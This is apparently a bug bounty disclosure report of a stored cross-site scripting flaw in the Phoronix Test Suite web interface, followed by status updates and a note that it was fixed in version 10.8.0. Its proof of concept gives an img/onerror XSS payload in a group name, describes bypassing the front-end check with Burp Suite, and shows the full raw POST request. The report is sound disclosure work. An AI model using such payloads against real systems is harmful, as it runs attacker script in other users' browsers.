Cross-site Scripting (XSS) - Stored in phoronix-test-suite/phoronix-test-suite
Valid
Reported on
Jan 4th 2022
Description
Hi there phoronix test suite maintainer team. There is a stored XSS in phoronix-test-suite source code. This is in group name.
Proof of Concept
- Install a local instance of phoronix test suite
- Create an account and log in, then create a group with name
<img src=a onerror=alert(1)>. Note that you cannot create this on the UI because JavaScript to forbid this is implemented. To do that, you need a tool like Burp Suite to bypass frontend check and create system group directly. A request for creating group with specials would look like this:
POST /?systems HTTP/1.1
Host: {phoronix}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
Origin: {phoronix}
Connection: close
Referer:{phoronix}?systems
Cookie: PHPSESSID=blfirmens92e3129mt1lsjt3m6; pts_websocket_server=ws%3A%2F%2F127.0.1.1%3A8427%2F
Upgrade-Insecure-Requests: 1
new_group=1235<img+src=a+onerror=alert(1)>
- After creating the system group, go back to
/?systemsand see that an alert pops up.
Impact
This vulnerability is capable of stored XSS.
We are processing your report and will contact the
phoronix-test-suite
team within 24 hours.
a year ago
We have contacted a member of the
phoronix-test-suite
team and are waiting to hear back
a year ago
We have sent a
follow up to the
phoronix-test-suite
team.
We will try again in 7 days.
a year ago
A phoronix-test-suite/phoronix-test-suite maintainer
marked this as fixed in
10.8.0 with commit 56fd0a
a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
to join this conversation